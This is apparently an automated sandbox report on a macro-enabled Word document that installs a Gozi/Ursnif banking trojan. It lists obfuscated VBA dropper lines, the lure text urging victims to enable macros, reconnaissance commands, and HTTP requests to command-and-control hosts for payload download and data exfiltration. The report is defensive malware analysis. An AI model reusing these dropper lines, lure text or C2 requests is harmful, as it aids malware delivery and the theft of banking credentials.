
Analysis Report e41ZuYVo64.docm

Overview

General Information

Joe Sandbox Version:26.0.0
Analysis ID:820806
Start date:20.03.2019
Start time:16:36:30
Joe Sandbox Product:Cloud
Overall analysis duration:0h 6m 19s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:e41ZuYVo64.docm
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of new started processes analysed:36
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:1
Technologies
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
  • GSI enabled (Java)
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.spre.phis.bank.troj.spyw.expl.evad.winDOCM@39/29@13/5
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 75%
  • Number of executed functions: 81
  • Number of non-executed functions: 228
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .docm
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, WmiPrvSE.exe, OSPPSVC.EXE
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Detection

Strategy | Score | Range | Reporting | Whitelisted | Detection
Threshold | 100 | 0 - 100 | Report FP / FN | false | malicious

Confidence

Strategy | Score | Range | Further Analysis Required? | Confidence
Threshold | 5 | 0 - 5 | false |


Classification

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons; more UI automation would likely extend the observed behavior.
Some HTTP requests failed (404); the sample has likely exhibited less behavior than it otherwise would.



Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control
Valid Accounts1 | Scripting32 | Hooking1 | Hooking1 | Rootkit2 | Hooking1 | Process Discovery3 | Application Deployment Software | Email Collection1 | Data Compressed | Standard Cryptographic Protocol1
Replication Through Removable Media | Exploitation for Client Execution23 | Valid Accounts1 | Valid Accounts1 | Masquerading1 | Credentials in Files1 | Security Software Discovery431 | Remote Services | Man in the Browser1 | Exfiltration Over Other Network Medium | Standard Non-Application Layer Protocol4
Drive-by Compromise | Windows Management Instrumentation | Registry Run Keys / Startup Folder1 | Process Injection811 | Valid Accounts1 | Input Capture | Remote System Discovery1 | Windows Remote Management | Data from Local System1 | Automated Exfiltration | Standard Application Layer Protocol114
Exploit Public-Facing Application | Scheduled Task | System Firmware | DLL Search Order Hijacking | Process Injection811 | Credentials in Files | System Network Configuration Discovery2 | Logon Scripts | Input Capture | Data Encrypted | Connection Proxy1
Spearphishing Link | Command-Line Interface | Shortcut Modification | File System Permissions Weakness | Scripting32 | Account Manipulation | System Information Discovery215 | Shared Webroot | Data Staged | Scheduled Transfer | Standard Cryptographic Protocol
Spearphishing Attachment | Graphical User Interface | Modify Existing Service | New Service | Obfuscated Files or Information1 | Brute Force | System Owner/User Discovery | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port

Trailing digits in a cell are the report's signature-count badges attached to that technique.

Signature Overview



Spreading:

Performs a network lookup / discovery via net view
Source: unknownProcess created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01413ECF CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,HeapFree,HeapFree,3_2_01413ECF
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00387121 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,16_2_00387121
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_003874A1 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,16_2_003874A1
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00391663 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,16_2_00391663

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: text.doc.16147.scr.0.dr
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Users\user\text.doc.16147.scr
Potential document exploit detected (performs DNS queries)
Source: global trafficDNS query: name: interruption.ru
Potential document exploit detected (performs HTTP gets)
Source: global trafficTCP traffic: 192.168.1.83:49204 -> 31.148.219.163:80
Potential document exploit detected (unknown TCP traffic)
Source: global trafficTCP traffic: 192.168.1.83:49204 -> 31.148.219.163:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: TrafficSnort IDS: 2021813 ET TROJAN Ursnif Variant CnC Beacon 192.168.1.83:49206 -> 37.152.176.90:80
Source: TrafficSnort IDS: 2021830 ET TROJAN Ursnif Variant CnC Data Exfil 192.168.1.83:49207 -> 46.139.176.151:80
Found Tor onion address
Source: avicbrkr.exe, 00000010.00000002.1217084078.0039C000.00000004.sdmpString found in binary or memory: .onion/
Source: avicbrkr.exe, 00000010.00000002.1217084078.0039C000.00000004.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientIniKeysScrLastTaskLastConfigCrHookOpHookExec.onion/TorClientTorCrc%s %s HTTP/1.1
May check the online IP address of the machine
Source: unknownDNS query: name: myip.opendns.com
Uses nslookup.exe to query domains
Source: unknownProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: unknownProcess created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Connects to IPs without corresponding DNS lookups
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163 (50 identical entries)
HTTP GET or POST without a user agent
Source: global trafficHTTP traffic detected: GET /free/t32.bin HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: interruption.ru
Uses a known web browser user agent for HTTP communication
Source: global trafficHTTP traffic detected: GET /images/logo2.png HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 31.148.219.163Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /images/Tgxl4eQFLRJ828TTb5/PbE8UHAw2/a53P1QPrTXCRCRA71Ih_/2BBJPZYAZohZ0gbHdmM/JIeRuHUg0_2BloM9tUxzvE/TCq3W9vuEdgKl/IIJpn7iq/nCbHpa_2BOmrGlofqsHXa2m/l7EvsA_2Bv/RUcywXGJJ0g8335L4/wbisH67pflFl/VqPEdPBTaVc/TGPIvkfBJu3_2Fpm/Mu1_2B.gif HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Host: profitsproject.ru
Source: global trafficHTTP traffic detected: POST /images/tGVH9_2Ftdk/sHH41UkampY3Rs/AruAX_2BFORV1KTdlHf40/r6WQws0nBnEhQX03/cynMOwBSQIanvYM/Q4c4COJMjT5QueN5IE/sEKnnjm3Z/aQugH8GJbl7WwfFkU5qM/QNQ84zIsh2Ycx8Z7LQq/5VdFr7kpjPC9bebuaMzXSP/qpLb_2F8n3QIM/JLv3hF1o/uYK3inluwQhgfC5rYmWjZyI/kOeewEdSz/qd.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=382116919742642393088User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Content-Length: 401Host: profitsproject.ru
Downloads files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word
Downloads files from webservers via HTTP
Source: global trafficHTTP traffic detected: GET /images/logo2.png HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 31.148.219.163Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /free/t32.bin HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: interruption.ru
Source: global trafficHTTP traffic detected: GET /images/Tgxl4eQFLRJ828TTb5/PbE8UHAw2/a53P1QPrTXCRCRA71Ih_/2BBJPZYAZohZ0gbHdmM/JIeRuHUg0_2BloM9tUxzvE/TCq3W9vuEdgKl/IIJpn7iq/nCbHpa_2BOmrGlofqsHXa2m/l7EvsA_2Bv/RUcywXGJJ0g8335L4/wbisH67pflFl/VqPEdPBTaVc/TGPIvkfBJu3_2Fpm/Mu1_2B.gif HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Host: profitsproject.ru
Performs DNS lookups
Source: unknownDNS traffic detected: queries for: interruption.ru
Posts data to webserver
Source: unknownHTTP traffic detected: POST /images/tGVH9_2Ftdk/sHH41UkampY3Rs/AruAX_2BFORV1KTdlHf40/r6WQws0nBnEhQX03/cynMOwBSQIanvYM/Q4c4COJMjT5QueN5IE/sEKnnjm3Z/aQugH8GJbl7WwfFkU5qM/QNQ84zIsh2Ycx8Z7LQq/5VdFr7kpjPC9bebuaMzXSP/qpLb_2F8n3QIM/JLv3hF1o/uYK3inluwQhgfC5rYmWjZyI/kOeewEdSz/qd.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=382116919742642393088User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Content-Length: 401Host: profitsproject.ru
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.2Date: Wed, 20 Mar 2019 16:38:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 1573Connection: closeReferrer-Policy: no-referrer
Urls found in memory or binary data
Source: avicbrkr.exe, 00000010.00000002.1217084078.0039C000.00000004.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
Source: avicbrkr.exe, 00000010.00000002.1217084078.0039C000.00000004.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: avicbrkr.exe, 00000010.00000002.1217084078.0039C000.00000004.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: avicbrkr.exe, 00000010.00000002.1219274895.019B8000.00000004.sdmpString found in binary or memory: http://interruption.ru/free/t32.bin
Source: avicbrkr.exe, 00000010.00000002.1219274895.019B8000.00000004.sdmpString found in binary or memory: http://interruption.ru/free/t64.bin
Source: explorer.exe, 00000005.00000000.1108931725.01CE0000.00000008.sdmpString found in binary or memory: http://www.%s.comPA

E-Banking Fraud:

Detected Gozi e-Banking trojan
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ff16_2_00371C56
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ie16_2_00371C56

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0Screenshot OCR: Enable Editing, and then click Enable Content. " You are attempting to open a file that was created
Source: Document image extraction number: 0Screenshot OCR: enable content to see this document. " If the file opens in Protected VIew, click Enable Editing, a
Source: Document image extraction number: 1Screenshot OCR: Enable Editing and then click Enable Content ' You are attempting to open a hie that was created in
Source: Document image extraction number: 1Screenshot OCR: enable content to see this document " If the file opens in Protected view, click Enable Editing and
Document contains an embedded VBA macro with suspicious strings
Source: e41ZuYVo64.docmOLE, VBA macro line: If Environ("NUMB" + "E" + O84BAz6 + J41vmf7 + We8mB50 + "R_O" + Vx1bX0T + "F" + KL0RGx1 + "_PR" + Xa3i2R0 + "OCE" + Zy6VpOn + "SSORS") < 2 Then GoTo B0476
Source: e41ZuYVo64.docmOLE, VBA macro line: x CStr(Environ("USERPROFILE")) & "\text.doc" & "." & "16147.scr"
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String environ: If Environ("NUMB" + "E" + O84BAz6 + J41vmf7 + We8mB50 + "R_O" + Vx1bX0T + "F" + KL0RGx1 + "_PR" + Xa3i2R0 + "OCE" + Zy6VpOn + "SSORS") < 2 ThenName: Document_Open
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String environ: x CStr(Environ("USERPROFILE")) & "\text.doc" & "." & "16147.scr"Name: Document_Open
Document contains an embedded VBA with functions possibly related to HTTP operations
Source: e41ZuYVo64.docmStream path 'VBA/JtuJu' : found possibly 'XMLHttpRequest' functions response, responsebody, open, send
Source: VBA code instrumentationOLE, VBA macro: Module JtuJu, Function I8BD2, found possibly 'XMLHttpRequest' functions response, responsebody, open, sendName: I8BD2
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\text.doc.16147.scr
Writes or reads registry keys via WMI
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - StdRegProv::GetStringValue
Source: C:\Windows\System32\driverquery.exeWMI Queries: IWbemServices::ExecMethod - StdRegProv::GetStringValue
Contains functionality to call native functions
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01412A7B NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,3_2_01412A7B
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_0141271B NtCreateSection,memset,RtlNtStatusToDosError,NtClose,3_2_0141271B
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01413C1B NtQuerySystemInformation,RtlNtStatusToDosError,3_2_01413C1B
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01411C29 memcpy,memcpy,memcpy,NtUnmapViewOfSection,RtlNtStatusToDosError,CloseHandle,memset,3_2_01411C29
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01413D34 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_01413D34
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_014126DC NtMapViewOfSection,RtlNtStatusToDosError,3_2_014126DC
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01413CF3 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_01413CF3
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01413789 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,3_2_01413789
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01413CB2 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_01413CB2
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01413B27 memset,NtQueryInformationProcess,3_2_01413B27
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01413D84 NtGetContextThread,NtGetContextThread,3_2_01413D84
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038A02C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,16_2_0038A02C
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038885B NtQueryInformationProcess,16_2_0038885B
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_003890AF memset,NtQueryInformationProcess,16_2_003890AF
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038F8C5 GetVersion,NtCreateWaitablePort,NtCreateDirectoryObject,GetLastError,16_2_0038F8C5
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0037C3A5 NtLoadKeyEx,memcpy,16_2_0037C3A5
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00386B82 NtCreateWaitablePort,memset,FlushFileBuffers,GetLastError,16_2_00386B82
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038940B NtQuerySystemInformation,RtlNtStatusToDosError,16_2_0038940B
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00390D1B memset,NtCancelIoFile,NtCancelIoFile,NtCancelIoFile,NtCancelIoFile,NtCancelIoFile,LocalFree,NtCancelIoFile,16_2_00390D1B
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038DE89 NtMapViewOfSection,RtlNtStatusToDosError,16_2_0038DE89
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038DEC8 NtCreateSection,memset,RtlNtStatusToDosError,NtClose,16_2_0038DEC8
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0037DF75 NtUnmapViewOfSection,RtlNtStatusToDosError,HeapFree,16_2_0037DF75
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038CF9B memcpy,memcpy,memcpy,NtUnmapViewOfSection,RtlNtStatusToDosError,CloseHandle,memset,16_2_0038CF9B
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0037D7EE memset,CreateMutexA,GetLastError,CloseHandle,RtlAllocateHeap,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,RtlAllocateHeap,LoadLibraryA,RtlAllocateHeap,wsprintfA,16_2_0037D7EE
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_003A3040 NtProtectVirtualMemory,NtProtectVirtualMemory,16_2_003A3040
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00632A7B NtOpenProcess,NtOpenProcessToken,NtClose,NtClose,16_2_00632A7B
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00633B27 memset,NtQueryInformationProcess,16_2_00633B27
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00631C29 memcpy,memcpy,memcpy,NtUnmapViewOfSection,RtlNtStatusToDosError,CloseHandle,memset,16_2_00631C29
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0063271B NtCreateSection,memset,RtlNtStatusToDosError,NtClose,16_2_0063271B
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00633C1B NtQuerySystemInformation,RtlNtStatusToDosError,16_2_00633C1B
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_006326DC NtMapViewOfSection,RtlNtStatusToDosError,16_2_006326DC
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038D9D6 CreateProcessAsUserA,16_2_0038D9D6
Creates mutexes
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeMutant created: \Sessions\2\BaseNamedObjects\MutexHelper
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeMutant created: \Sessions\2\BaseNamedObjects\{04078505-93E6-D63A-3D78-776AC12C9B3E}
Detected potential crypto function
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01414F583_2_01414F58
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038081916_2_00380819
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0037F8F816_2_0037F8F8
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00374A2716_2_00374A27
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00383C1916_2_00383C19
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038440316_2_00384403
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00395C4C16_2_00395C4C
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_003824E616_2_003824E6
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0037FCC416_2_0037FCC4
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00384CC316_2_00384CC3
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0037E76416_2_0037E764
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00634F5816_2_00634F58
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: e41ZuYVo64.docmOLE, VBA macro line: Sub Document_Open()
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_OpenName: Document_Open
Document contains embedded VBA macros
Source: e41ZuYVo64.docmOLE indicator, VBA macros: true
Document contains no OLE stream with summary information
Source: e41ZuYVo64.docmOLE indicator has summary info: false
Document has an unknown application name
Source: e41ZuYVo64.docmOLE indicator application name: unknown
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: e41ZuYVo64.docmOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Reads the hosts file
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hosts
Binary contains device paths (device paths are often used for kernel mode <-> user mode communication)
Source: 152E.bin1.13.drBinary string: Boot Device: \Device\HarddiskVolume1
Classification label
Source: classification engineClassification label: mal100.spre.phis.bank.troj.spyw.expl.evad.winDOCM@39/29@13/5
Contains functionality to enum processes or threads
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0037B652 CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,Thread32Next,16_2_0037B652
Creates files inside the user directory
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$1ZuYVo64.docm
Creates temporary files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user~1\AppData\Local\Temp\CVR446E.tmp
Document contains summary information with irregular field values
Source: e41ZuYVo64.docmOLE document summary: title field not present or empty
Source: e41ZuYVo64.docmOLE document summary: author field not present or empty
Source: e41ZuYVo64.docmOLE document summary: edited time not present or 0
Found command line output
Source: C:\Windows\System32\systeminfo.exeConsole Write: Loading Operating System Information
Source: C:\Windows\System32\systeminfo.exeConsole Write: Loading Computer Information
Source: C:\Windows\System32\systeminfo.exeConsole Write: Loading Processor Information
Source: C:\Windows\System32\systeminfo.exeConsole Write: Loading BIOS Information
Source: C:\Windows\System32\systeminfo.exeConsole Write: Loading Input Locale Information
Source: C:\Windows\System32\systeminfo.exeConsole Write: Loading TimeZone Information
Source: C:\Windows\System32\systeminfo.exeConsole Write: Loading Profile Information
Source: C:\Windows\System32\systeminfo.exeConsole Write: Loading Pagefile Information
Source: C:\Windows\System32\systeminfo.exeConsole Write: Loading Hotfix Information
Source: C:\Windows\System32\systeminfo.exeConsole Write: Loading Network Card Information
Source: C:\Windows\System32\net.exeConsole Write: System error 6118 has occurred
Source: C:\Windows\System32\net.exeConsole Write: ..........................0.............................................r.r.e.d.............t.,.%t....,.......&.........Jump to behavior
Source: C:\Windows\System32\net.exeConsole Write: ....................a.+u..0.....................................................8...........t.,.%t..................8...Jump to behavior
Source: C:\Windows\System32\net.exeConsole Write: ..........................0.....................................................8...........t.,.%t....,.................Jump to behavior
Queries process information (via WMI, Win32_Process)
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Reads ini files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Users\user\text.doc.16147.scr | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processes
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown | Process created: C:\Users\user\text.doc.16147.scr C:\Users\user\text.doc.16147.scr
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\22E8.bi1'
Source: unknown | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\22E8.bi1'
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /C 'systeminfo.exe > C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: unknown | Process created: C:\Windows\System32\systeminfo.exe systeminfo.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe 'C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe'
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /C 'net view >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: unknown | Process created: C:\Windows\System32\net.exe net view
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup 127.0.0.1 >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: unknown | Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /C 'tasklist.exe /SVC >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: unknown | Process created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /C 'driverquery.exe >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: unknown | Process created: C:\Windows\System32\driverquery.exe driverquery.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Users\user\text.doc.16147.scr C:\Users\user\text.doc.16147.scr
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\22E8.bi1'
